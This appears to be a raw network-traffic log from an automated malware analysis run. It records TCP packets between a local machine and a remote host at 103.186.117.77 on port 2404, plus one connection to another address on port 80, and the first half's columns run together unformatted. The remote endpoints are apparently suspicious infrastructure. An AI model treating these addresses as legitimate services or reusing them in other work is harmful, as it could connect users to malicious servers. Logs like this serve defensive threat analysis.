                                                            Oct 28, 2024 18:37:10.179763079 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.180315971 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.180332899 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.180341005 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.180568933 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.181415081 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.181483984 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.181704044 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.182651043 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.182739973 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.183216095 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.183841944 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.183927059 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.183998108 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.185034037 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.185156107 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.185280085 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.186290026 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.186408997 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.186639071 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.187433958 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.187519073 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.188659906 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.188786983 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.188818932 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.188927889 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.189904928 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.189999104 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.190421104 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.191030979 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.191083908 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.191184998 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.192251921 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.192522049 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.192651033 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.193567991 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.193584919 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.193717003 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.194642067 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.194768906 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.195837021 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.195967913 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.195995092 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.196301937 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.197021961 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.197127104 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.197258949 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.198235035 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.198306084 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.199485064 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.199651003 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.199711084 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.200006008 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.200625896 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.200733900 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.201419115 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.201869965 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.201937914 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.202040911 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.203083038 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.203222036 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.204282045 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.204318047 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.204372883 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.204634905 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.205492973 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.205624104 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.206785917 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.206902027 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.206971884 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.207876921 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.207966089 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.208019972 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.209085941 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.209187984 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.209283113 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.210335016 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.210407019 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.210484982 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.210557938 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.211549997 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.211566925 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.211694002 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.212711096 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.212807894 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.213474989 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.213960886 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.214183092 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.214250088 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.215109110 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.215205908 CET4971480192.168.2.5178.237.33.50
                                                            Oct 28, 2024 18:37:10.215215921 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.215332985 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.216350079 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.216422081 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.216670036 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.217593908 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.217725039 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.217861891 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.218833923 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.218849897 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.218967915 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.219943047 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.220069885 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.220186949 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.221257925 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.221273899 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.221383095 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.222383022 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.222408056 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.223153114 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.223572969 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.223731041 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.223849058 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.224790096 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.224956036 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.225163937 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.226057053 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.226330996 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.226422071 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.227339983 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.227446079 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.228382111 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.228543997 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.228571892 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.228647947 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.229681015 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.229796886 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.229888916 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.230874062 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.230937004 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.231270075 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.232031107 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.232120991 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.233149052 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.233230114 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.233345985 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.233474970 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.234309912 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.234395981 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.234560013 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.235570908 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.235694885 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.236355066 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.236502886 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.236620903 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.237000942 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.237570047 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.237674952 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.237878084 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.238663912 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.238779068 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.238934994 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.239617109 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.239780903 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.239847898 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.240686893 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.240818977 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.240890026 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.241636992 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.241763115 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.242552996 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.242697001 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.242741108 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.243557930 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.243662119 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.243697882 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.243814945 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.244395971 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.244538069 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.244673967 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.245253086 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.245364904 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.245928049 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.246126890 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.246198893 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.246366024 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.247025013 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.247157097 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.247472048 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.247797012 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.247873068 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.247987986 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.248641968 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.248778105 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.248893023 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.249636889 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.249813080 CET240449713103.186.117.77192.168.2.5
                                                            Oct 28, 2024 18:37:10.250010967 CET497132404192.168.2.5103.186.117.77
                                                            Oct 28, 2024 18:37:10.250224113 CET240449713103.186.117.77192.168.2.5
Timestamp                            Src Port  Dst Port  Source IP        Dest IP
Oct 28, 2024 18:37:10.250363111 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.250686884 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.250998974 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.251090050 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.251318932 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.251774073 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.251894951 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.252254963 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.252638102 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.252706051 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.252767086 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.252882004 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263154030 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263170958 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263185978 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263289928 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.263289928 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.263581038 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263596058 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263621092 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263636112 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263652086 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.263652086 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.263892889 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.264353037 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.264457941 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.264491081 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.297199965 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297225952 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297240973 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297266006 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.297355890 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297373056 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297430038 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.297558069 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.297660112 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297703981 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297729015 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297744036 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297759056 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.297769070 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.297895908 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.298544884 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.299957037 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.374669075 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.374749899 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.374767065 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.374896049 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.403131008 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403160095 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403175116 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403238058 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.403275967 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403294086 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403307915 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.403459072 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.403567076 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403614998 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403631926 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403695107 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403709888 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.403722048 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.403794050 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.461427927 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461446047 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461488008 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461505890 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461519957 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461543083 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.461569071 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.461841106 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461858034 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461874008 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461935997 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.461935997 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.461955070 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.461971045 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.462301970 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.462749004 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.462871075 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.463001966 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.513067007 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.513083935 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.513098001 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.513261080 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.536104918 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.536122084 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.536137104 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.536215067 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.536215067 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.540081978 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540096998 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540124893 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540139914 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540148973 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.540159941 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540386915 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.540529966 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540548086 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540560007 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.540635109 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.540635109 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.575625896 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.575644016 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.575659037 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.575690985 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.597913980 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.597964048 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.598083019 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598098993 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598143101 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.598149061 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598165035 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598211050 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.598398924 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598520994 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598552942 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598557949 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.598572016 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598587036 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.598716021 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.644474983 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.644490957 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.644505978 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.644537926 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.644603014 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.670489073 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.670507908 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.670522928 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.670550108 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.677366018 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677433014 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677448988 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677474976 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.677527905 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.677541018 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677556992 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677612066 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.677906990 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677922964 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677937984 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.677993059 CET  49713     2404      192.168.2.5      103.186.117.77
Oct 28, 2024 18:37:10.712950945 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.712970018 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.712991953 CET  2404      49713     103.186.117.77   192.168.2.5
Oct 28, 2024 18:37:10.713124990 CET  49713     2404      192.168.2.5      103.186.117.77
